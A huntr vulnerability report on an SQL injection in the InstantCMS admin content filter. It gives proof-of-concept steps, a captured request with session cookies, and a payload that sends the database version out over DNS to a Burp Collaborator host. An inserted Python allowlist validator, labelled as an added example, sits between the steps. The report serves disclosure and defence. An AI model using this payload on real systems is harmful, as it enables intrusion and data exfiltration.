huntr report CB72CC17-5A0D-4392-9A5F-A13AA773DE9E by ghostdragozn
History: Sep 12, 2023 - 2:53 a.m.

SQL Injection Vulnerability in Content Page

Published: 2023-09-12 02:53:38 | Author: ghostdragozn | Source: www.huntr.dev
9
Tags: sql injection, content page, filter vulnerability, proof of concept, admin login, exploit example

EPSS: 0.001 (Percentile: 31.9%)

In the admin Content page, there is a SQL injection vulnerability in the Filter function. To exploit it, an attacker injects SQL into a filter field that is used as a column name.

Proof of Concept

1. Log in as admin.

2. Go to "http://127.0.0.1/icms2/admin/content/5". In this case, the number 5 is the content's id (it can be changed to any id you have).

3. Click the Filter button, then click the Apply button.

4. Intercept this request:

POST /icms2/admin/content/5/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 2478
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykAkt8RxbexNHSIRg
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/icms2/admin/content/5
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: icms[62formwidgettemplateoptions]=basic_options; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%3A%22reg%22%2C%22i%22%3A%227%3ADAY%22%2C%22t%22%3A%22bar%22%7D; eeb4d5874c6380489fbb8d97b5eb70d5=26u44e1dbns40301ivn5tv8q66; icms[device_type]=desktop; icms[guest_date_log]=1694455424; ICMS64FF53AAE1F09=ltpmbrm096eo0q6p1pb1bn9q4v; icms[content_tree_path]=%2F5.1; icms[introjs_widgets]=1; icms[widgets_tree_path]=%2Fcontent%2Fcontent.163; icms[menu_tree_path]=%2F1.0
Connection: close

------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="filter"

page%253d1%2526advanced_filter%253dfilters%255b0%255d%255bfield%255d%253dtitle%2526filters%255b0%255d%255bcondition%255d%253dlk%2526filters%255b0%255d%255bvalue%255d%253daaa%2526filters%255b1%255d%255bfield%255d%253ddate_pub%2526filters%255b1%255d%255bcondition%255d%253deq%2526filters%255b1%255d%255bvalue%255d%253d%2526filters%255b2%255d%255bfield%255d%253duser_id%2526filters%255b2%255d%255bcondition%255d%253deq%2526filters%255b2%255d%255bvalue%255d%253d%2526filters%255b3%255d%255bfield%255d%253dkind%2526filters%255b3%255d%255bcondition%255d%253deq%2526filters%255b3%255d%255bvalue%255d%253d%2526filters%255b4%255d%255bfield%255d%253dsource%2526filters%255b4%255d%255bcondition%255d%253dlk%2526filters%255b4%255d%255bvalue%255d%253d%2526filters%255b5%255d%255bfield%255d%253dteaser%2526filters%255b5%255d%255bcondition%255d%253dlk%2526filters%255b5%255d%255bvalue%255d%253d%2526filters%255b6%255d%255bfield%255d%253dcontent%2526filters%255b6%255d%255bcondition%255d%253dlk%2526filters%255b6%255d%255bvalue%255d%253d%2526filters%255b7%255d%255bfield%255d%253dfeatured%2526filters%255b7%255d%255bcondition%255d%253deq%2526filters%255b7%255d%255bvalue%255d%253d%2526filters%255b8%255d%255bfield%255d%253dnotice%2526filters%255b8%255d%255bcondition%255d%253dlk%2526filters%255b8%255d%255bvalue%255d%253d%2526filters%255b9%255d%255bfield%255d%253drating%2526filters%255b9%255d%255bcondition%255d%253deq%2526filters%255b9%255d%255bvalue%255d%253d%2526filters%255b10%255d%255bfield%255d%253dcomments%2526filters%255b10%255d%255bcondition%255d%253deq%2526filters%255b10%255d%255bvalue%255d%253d%2526filters%255b11%255d%255bfield%255d%253dhits_count%2526filters%255b11%255d%255bcondition%255d%253deq%2526filters%255b11%255d%255bvalue%255d%253d%2526filters%255b12%255d%255bfield%255d%253dis_deleted%2526filters%255b12%255d%255bcondition%255d%253deq%2526filters%255b12%255d%255bvalue%255d%253d%2526perpage%253d30%2526order_by%253ddate_pub%2526order_to%253ddesc
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

date_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_approved
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

user_id
------WebKitFormBoundarykAkt8RxbexNHSIRg--

5. Edit the above request:

Replace the string title with the string load_file(concat('%255c%255c%255c%255c',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com%255c%255chen')) in the parameter filters%255b0%255d%255bfield%255d%253d. Then send it with Repeater.
Decoded, the payload is filters[0][field]=(select load_file(concat('\\\\',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com\\hen'))): concat() appends the result of version() to a UNC path whose hostname is the Collaborator domain, and load_file() makes the database server resolve that hostname, so the version string leaves the server inside a DNS query.
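The filter parameter in the captured request is a query string that has been percent-encoded twice, and the report's payload works by replacing the column name in filters[0][field] with SQL. The Python below is an added example, not InstantCMS code and not part of the original report: it decodes such a parameter, checks every field and condition name against an allowlist of known columns, and builds a parameterised WHERE clause only from allowlisted identifiers, binding the user-supplied values as query parameters. The column allowlist (taken from the field names visible in the request above), the condition set and the two sample payloads are constructed assumptions.

```python
"""Allowlist check and safe clause builder for a double-URL-encoded filter
parameter. Added example (not InstantCMS code); column list, conditions and
sample payloads are constructed for illustration."""
import re
from urllib.parse import parse_qs, quote, unquote

# Assumed allowlist: the field names seen in the captured request. A real
# deployment would derive this from the content type's schema.
ALLOWED_FIELDS = {
    "title", "date_pub", "user_id", "kind", "source", "teaser", "content",
    "featured", "notice", "rating", "comments", "hits_count", "is_deleted",
}
ALLOWED_CONDITIONS = {"eq", "lk", "gt", "lt"}          # assumed condition set
OPERATORS = {"eq": "=", "gt": ">", "lt": "<"}          # "lk" becomes LIKE
FILTER_KEY = re.compile(r"^filters\[(\d+)\]\[(field|condition|value)\]$")


def decode_filter(raw: str, max_rounds: int = 3) -> dict:
    """Undo nested percent-encoding (the captured request is encoded twice,
    e.g. %253d -> %3d -> '=') and parse the result as a query string."""
    s = raw
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return {k: v[0] for k, v in parse_qs(s, keep_blank_values=True).items()}


def parse_filters(params: dict) -> dict:
    """Group filters[N][...] keys into {N: {"field":..,"condition":..,"value":..}}."""
    out = {}
    for k, v in params.items():
        m = FILTER_KEY.match(k)
        if m:
            out.setdefault(int(m.group(1)), {})[m.group(2)] = v
    return out


def find_violations(raw: str) -> list:
    """Return (index, key, value) for every filter whose field or condition is
    not an allowlisted identifier. Identifiers cannot be bound as query
    parameters, so anything outside the allowlist must be rejected."""
    bad = []
    for i, f in sorted(parse_filters(decode_filter(raw)).items()):
        if f.get("field") not in ALLOWED_FIELDS:
            bad.append((i, "field", f.get("field")))
        if f.get("condition") not in ALLOWED_CONDITIONS:
            bad.append((i, "condition", f.get("condition")))
    return bad


def build_where(raw: str):
    """Build (clause, params): identifiers only from the allowlist, values
    bound as '?' parameters. Raises ValueError on any unexpected identifier."""
    if find_violations(raw):
        raise ValueError("unexpected filter identifier")
    clauses, params = [], []
    for _, f in sorted(parse_filters(decode_filter(raw)).items()):
        if f.get("value", "") == "":
            continue  # empty filters are ignored, as in the captured request
        if f["condition"] == "lk":
            clauses.append(f"`{f['field']}` LIKE ?")
            params.append(f"%{f['value']}%")
        else:
            clauses.append(f"`{f['field']}` {OPERATORS[f['condition']]} ?")
            params.append(f["value"])
    return " AND ".join(clauses), params


def encode_twice(qs: str) -> str:
    """Reproduce the double encoding used by the filter form (constructed)."""
    return quote(quote(qs, safe=""), safe="")


# Constructed sample payloads: a normal filter and one with SQL in the field name.
BENIGN = encode_twice(
    "page=1&filters[0][field]=title&filters[0][condition]=lk"
    "&filters[0][value]=aaa&perpage=30")
HOSTILE = encode_twice(
    "page=1&filters[0][field]=(select version())&filters[0][condition]=lk"
    "&filters[0][value]=aaa")

if __name__ == "__main__":
    print("benign violations:", find_violations(BENIGN))
    print("benign clause:", build_where(BENIGN))
    print("hostile violations:", find_violations(HOSTILE))
```

The check is deliberately on identifiers rather than on values: a value such as `aaa` is bound as a parameter and can contain anything, whereas a column or condition name is spliced into the SQL text and must come from a fixed set.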

6. Get result:

At Burp Collaborator, I get the MySQL version number in the DNS record: 10.4.28-MariaDB.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com.

7. Video POC:

a. On the web interface

https://drive.google.com/file/d/1X_7ex2viGIB7AO7j_rCzp2zZdpm8KSvI/view?usp=drive_link

b. Intercept the request and edit it with the payload

https://drive.google.com/file/d/1Svs6VHTJ89gaADCYtKFhnHkIHeSyD8DF/view?usp=drive_link

